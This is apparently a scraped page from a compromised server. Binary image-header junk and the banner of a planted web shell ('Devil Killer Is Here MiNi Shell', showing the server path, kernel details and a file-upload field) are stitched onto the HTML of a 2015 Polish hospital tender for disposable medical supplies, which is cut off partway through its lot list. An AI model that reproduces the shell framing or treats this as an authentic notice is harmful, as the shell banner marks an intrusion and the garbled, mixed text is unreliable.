JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151008/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151008/265968-N-2015.html

<p class="kh_header"><b>Zielona Góra: Postępowania o udzielenie zamówienia publicznego, zwanego dalej zamówieniem, na sukcesywne dostawy sprzętu medycznego jednokrotnego użytku (drenów, cewników, sond, kateterów, zestawów do drenażu, wkładów do ssaków, masek, czepków, elektrod, ostrzy do skalpela, worków na mocz, wzierników, rurek intubacyjnych, termometrów, nebulizatorów, itp.) worków na zwłoki, myjek, ustników do gazu entonox, klipsów naczyniowych do laparoskopii, szyn palcowych Zimmera oraz worków do żywienia pozajelitowego typu Nutrimix</b><br>
<b>Numer ogłoszenia: 265968 - 2015; data zamieszczenia: 08.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Wojewódzki  Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Zyty 26, 65-046 Zielona Góra, woj. lubuskie, tel. 068 3296200, faks 068 3255808.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.zgora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Postępowania o udzielenie zamówienia publicznego, zwanego dalej zamówieniem, na sukcesywne dostawy sprzętu medycznego jednokrotnego użytku (drenów, cewników, sond, kateterów, zestawów do drenażu, wkładów do ssaków, masek, czepków, elektrod, ostrzy do skalpela, worków na mocz, wzierników, rurek intubacyjnych, termometrów, nebulizatorów, itp.) worków na zwłoki, myjek, ustników do gazu entonox, klipsów naczyniowych do laparoskopii, szyn palcowych Zimmera oraz worków do żywienia pozajelitowego typu Nutrimix.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 674 790,00 PLN (zamówienie podstawowe i uzupełniające) są sukcesywne dostawy cewników, drenów i kateterów różnego rodzaju, zgłębników i  sond żołądkowych, worków do zbiórki moczu, butelek typu Redon, zestawów do aktywnego drenażu, rurek intubacyjnych, tracheostomijnych ustno - gardłowych, prowadnic do rurek intubacyjnych, zestawów medycznych jednokrotnego użytku do drenażu pęcherza moczowego, i szynowania moczowodów, pojemników do transportu wycinków histopatologicznych, ostrzy do skalpeli, czepków, masek, fartuchów i prześcieradeł z włókniny, szpatułek, nebulizatorów, masek z nebulizatorem oraz z rezerwuarem, opasek identyfikacyjnych, zaciskaczy do pępowiny, kaczek, basenów, misek nerkowatych, wzierników ginekologicznych, myjek dla chorych, termometrów, ciśnieniomierzy, elektrod do EKG oraz żeli do USG, worków stomijnych, urostomijnych i pasty stomijnej, worków na zwłoki, szyn palcowych Zimmera, przyrządów do podawania i rozpuszczania leków, ustników do gazu entonox, klipsów naczyniowych do laparoskopii oraz worków do żywienia pozajelitowego typu Nutrimix.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Przedmiotem zamówień uzupełniających do 20% wartości zamówienia podstawowego są sukcesywne dostawy cewników, drenów i kateterów różnego rodzaju, zgłębników i  sond żołądkowych, worków do zbiórki moczu, butelek typu Redon, zestawów do aktywnego drenażu, rurek intubacyjnych, tracheostomijnych ustno - gardłowych, prowadnic do rurek intubacyjnych, zestawów medycznych jednokrotnego użytku do drenażu pęcherza moczowego, i szynowania moczowodów, pojemników do transportu wycinków histopatologicznych, ostrzy do skalpeli, czepków, masek, fartuchów i prześcieradeł z włókniny, szpatułek, nebulizatorów, masek z nebulizatorem oraz z rezerwuarem, opasek identyfikacyjnych, zaciskaczy do pępowiny, kaczek, basenów, misek nerkowatych, wzierników ginekologicznych, myjek dla chorych, termometrów, ciśnieniomierzy, elektrod do EKG oraz żeli do USG, worków stomijnych, urostomijnych i pasty stomijnej, worków na zwłoki, szyn palcowych Zimmera, przyrządów do podawania i rozpuszczania leków, ustników do gazu entonox, klipsów naczyniowych do laparoskopii oraz worków do żywienia pozajelitowego typu Nutrimix</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2, 33.14.16.40-8, 33.15.72.00-7, 33.19.23.20-1, 33.14.16.41-5, 33.14.15.15-4, 33.14.16.00-6, 39.52.50.00-8, 33.14.00.00-3, 33.70.00.00-7, 33.14.10.00-0, 33.14.14.11-4, 33.17.11.00-0, 33.17.12.00-1, 33.14.16.25-7, 33.92.20.00-9, 33.14.11.20-7, 33.19.00.00-8, 33.14.17.60-5, 33.14.16.20-2, 33.10.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 19.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przed upływem terminu składania ofert wykonawca zobowiązany jest wnieść wadium w wysokości ustalonej dla poszczególnego zadania:
- zadanie nr 1 -    3 500,00 PLN
- zadanie nr 2 -    2 500,00 PLN
- zadanie nr 3 -	    650,00 PLN
- zadanie nr 4 -	    500,00 PLN
- zadanie nr 5 -	    150,00 PLN
- zadanie nr 6 -	    100,00 PLN
- zadanie nr 7 -	    350,00 PLN
- zadanie nr 8 -	    100,00 PLN
- zadanie nr 9 -	    300,00 PLN
- zadanie nr 10 -       90,00 PLN
- zadanie nr 11 -      400,00 PLN
- zadanie nr 12 -        50,00 PLN
- zadanie nr 13 -      200,00 PLN
- zadanie nr 14 -      500,00 PLN
- zadanie nr 15 -      600,00 PLN
- zadanie nr 16 -      250,00 PLN
- zadanie nr 17 -      100,00 PLN
- zadanie nr 18 -      650,00 PLN
- zadanie nr 19 -      800,00 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują zasobami niezbędnymi do realizacji przedmiotu zamówienia- zadania lub zadań w zakresie posiadanej wiedzy i doświadczenia. Ocena spełniania przez wykonawców przedmiotowego warunku udziału w postępowaniu dokonana zostanie według kryterium /spełnia - nie spełnia/ na podstawie analizy treści przedłożonego/ ych dokumentu/ ów: oświadczenie wykonawcy oraz ewentualnie właściwe zobowiązanie podmiotu trzeciego udostępniającego zasób w zakresie wiedzy i doświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują zasobami niezbędnymi do realizacji przedmiotu zamówienia - zadania lub zadań w zakresie dysponowania odpowiednim potencjałem technicznym. Ocena spełniania przez wykonawców przedmiotowego warunku udziału w postępowaniu dokonana zostanie według kryterium / spełnia - nie spełnia / na podstawie analizy treści przedłożonego/ ych dokumentu/ ów: oświadczenie wykonawcy oraz ewentualnie właściwe zobowiązanie podmiotu trzeciego udostępniającego zasób w zakresie dysponowania odpowiednim potencjałem technicznym</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują zasobami niezbędnymi do realizacji przedmiotu zamówienia - zadania lub zadań w zakresie dysponowania osobami zdolnymi do wykonania zamówienia. Ocena spełniania przez wykonawców przedmiotowego warunku udziału w postępowaniu dokonana zostanie według kryterium / spełnia - nie spełnia / na podstawie analizy treści przedłożonego/ ych dokumentu/ ów: oświadczenie wykonawcy oraz ewentualnie właściwe zobowiązanie podmiotu trzeciego udostępniającego zasób w zakresie dysponowania osobami zdolnymi do wykonania zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują zasobami niezbędnymi do realizacji przedmiotu zamówienia- zadania lub zadań w zakresie sytuacji ekonomicznej i finansowej. Ocenia spełniania przez wykonawców przedmiotowego warunku udziału w postępowaniu dokonana zostanie według kryterium / spełnia - nie spełnia / na podstawie analizy treści przedłożonego/ ych dokumentu/ ów: 1) oświadczenie wykonawcy oraz ewentualnie właściwe zobowiązanie podmiotu udostępniającego zasób dotyczący zdolności finansowej 2)opłacona polisa, a w przypadku jej braku inny właściwy dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - zadania na kwotę co najmniej:    
-   90 000,00 złotych, jeżeli składana oferta dotyczyć będzie wyłącznie zadania nr 1,
-   65 000,00 złotych, jeżeli składana oferta dotyczyć będzie wyłącznie zadania nr 2,
-   15 000,00 złotych, jeżeli składana oferta dotyczyć będzie wyłącznie zadania nr 3 lub nr 15 lub nr 18
-   12 000,00 złotych, jeżeli składana oferta dotyczyć będzie wyłącznie zadania nr 4 lub nr 14
-     3 500,00 złotych, jeżeli składana oferta dotyczyć będzie wyłącznie zadania nr 5,
-     2 000,00 złotych, jeżeli składana oferta dotyczyć będzie wyłącznie zadania nr 6 lub nr 8 lub nr 10 lub nr 17
-     8 500,00 złotych, jeżeli składana oferta dotyczyć będzie wyłącznie zadania nr 7 lub nr 11
-     6 000,00 złotych, jeżeli składana oferta dotyczyć będzie wyłącznie zadania nr 9 lub nr 16
-        900,00 złotych, jeżeli składana oferta dotyczyć będzie wyłącznie zadania nr 12,
-     4 500,00 złotych, jeżeli składana oferta dotyczyć będzie wyłącznie zadania nr 13,
-    19 000,00 złotych, jeżeli składana oferta dotyczyć będzie wyłącznie zadania nr 19
UWAGI : W przypadku składania oferty obejmującej więcej niż jedno zadanie wartość przedmiotowego dokumentu powinna odpowiadać co najmniej najwyższej wartości wymaganej dla zadania ujętego w takiej ofercie. Jeżeli wykonawca przedkłada polisę z której wynika, że termin płatności, pierwszej raty składki ubezpieczenia lub całości składki ubezpieczenia został odroczony i upływa po terminie składania ofert, to również ma obowiązek udokumentować fakt opłacenia przed upływem terminu składania ofert przedmiotowej - odroczonej pierwszej raty składki lub całości składki ubezpieczenia. Każda przedkładana polisa musi być opłacona</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin realizacji dostaw częściowych - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Strony dopuszczają zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w przypadku: 
1) zmiany danych podmiotowych Wykonawcy (np. w wyniku przekształcenia, przejęcia itp.),
2) zmiany cen jednostkowych przedmiotu umowy w sytuacji okresowych promocji, bądź obniżenia ceny przez producenta w trakcie trwania umowy,
3) szczególnych okoliczności takich jak zaprzestanie lub wstrzymanie wytwarzania wyrobów objętych umową, wygaśnięcia  świadectwa  ich  rejestracji albo  wycofania ze sprzedaży.
W powyższych przypadkach Strony mogą dopuścić dostarczenie odpowiedników o parametrach nie gorszych od wyrobów objętych umową.
Cena dostarczonego  odpowiednika nie może być wyższa od ceny wyrobu zastąpionego.
4) zmiany sposobu  konfekcjonowania i  wielkości jednostkowej wyrobu, którego cena po odpowiednim przeliczeniu nie będzie wyższa niż cena wyrobu objętego umową.
5) konieczności   przesunięcia terminów umownych, jeżeli konieczność ta, nastąpiła na skutek okoliczności, których nie  można było  przewidzieć w chwili zawierania niniejszej  umowy np. siły wyższej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.szpital.zgo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba zamawiającego, budynek A-administracji, pokój 019 - cena 26,00 PLN + koszty przekazania.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.10.2015 godzina 10:00, miejsce: Siedziba zamawiającego , budynek A-administracji, pokój 201, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sukcesywne dostawy cewników i drenów różnego rodzaju, zgłębników i sond żołądkowych, zatyczek
do cewników, łączników do drenów, butelek do odsysania ran, worków i woreczków do moczu, wieszaków do worków do moczu oraz zestawów do aktywnego drenażu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 207 720,00 PLN (zamówienie podstawowe i uzupełniające) są dostawy cewników i drenów różnego rodzaju, zgłębników i sond żołądkowych, zatyczek do cewników, łączników do drenów, butelek do odsysania ran, worków i woreczków do moczu, wieszaków do worków do moczu oraz zestawów do aktywnego drenażu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2, 33.14.16.40-8, 33.14.16.41-5, 33.14.16.15-4, 33.19.23.20-1, 33.14.16.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostaw częściowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sukcesywne dostawy czepków, masek, fartuchów i prześcieradeł z włókniny, fartuchów i butów foliowych, ostrzy jednokrotnego użytku do skalpeli, ostrzy z rękojeścią, szpatułek, kieliszków, tasiemek identyfikacyjnych, zaciskaczy do pępowiny, pojemników do wycinków histopatologicznych, wzierników ginekologicznych, ustników do gastroskopii, kaczek, basenów, słoi do moczu, ciśnieniomierzy oraz tacek na leki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 145 920,00 PLN (zamówienie podstawowe i uzupełniające) są dostawy czepków, masek, fartuchów i prześcieradeł z włókniny, fartuchów i butów foliowych, ostrzy jednokrotnego użytku do skalpeli, ostrzy z rękojeścią, szpatułek, kieliszków, tasiemek identyfikacyjnych, zaciskaczy do pępowiny, pojemników do wycinków histopatologicznych, wzierników ginekologicznych, ustników do gastroskopii, kaczek, basenów, słoi do moczu, ciśnieniomierzy oraz tacek na leki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.11-4, 33.14.10.00-0, 33.14.00.00-3, 33.17.11.10-3, 33.16.22.00-5, 39.52.50.00-8, 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostaw częściowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Sukcesywne dostawy rurek intubacyjnych zbrojonych z mankietem i bez mankietu, rurek intubacyjnych z mankietem i bez mankietu, rurek  tracheostomijnych, rurek ustno-gardłowych, rurek intubacyjnych kształtowych nosowych z mankietem, prowadnic do rurek intubacyjnych jednokrotnego użytku oraz prowadnic do trudnych intubacji wielokrotnego użytku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 37 560,00 PLN (zamówienie podstawowe i uzupełniające) są dostawy rurek intubacyjnych zbrojonych z mankietem i bez mankietu, rurek intubacyjnych z mankietem i bez mankietu, rurek  tracheostomijnych, rurek ustno-gardłowych, rurek intubacyjnych kształtowych nosowych z mankietem, prowadnic do rurek intubacyjnych jednokrotnego użytku oraz prowadnic do trudnych intubacji wielokrotnego użytku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.11.00-0, 33.14.00.00-3, 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostaw częściowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Sukcesywne dostawy elektrod dla noworodków, dzieci i dorosłych, elektrod do badań Holterowskich oraz żeli
do USG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 28 740,00 PLN (zamówienie podstawowe i uzupełniające) są dostawy  elektrod dla noworodków, dzieci i dorosłych, elektrod do badań Holterowskich oraz żeli do USG.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostaw częściowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Sukcesywne dostawy kateterów do drenażu klatki piersiowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 8 400,00 PLN (zamówienie podstawowe i uzupełniające) są dostawy kateterów do drenażu klatki piersiowej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.25-7, 33.14.16.40-8.</p></li>
